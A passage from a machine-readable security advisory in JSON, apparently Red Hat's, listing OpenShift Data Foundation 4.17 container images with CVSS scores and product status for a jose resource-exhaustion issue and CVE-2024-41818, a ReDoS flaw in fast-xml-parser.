"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jose: resource exhaustion"
},
{
"cve": "CVE-2024-41818",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-29T16:24:42+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2300499"
}
],
"notes": [
{
"category": "description",
"text": "A regular expression denial of service (ReDoS) flaw was found in fast-xml-parser in the currency.js script. By sending a specially crafted regex input, a remote attacker could cause a denial of service condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: ReDOS at currency parsing in currency.js",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat has decided to rate this vulnerability as Important due to the potential loss of Availability and the low complexity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
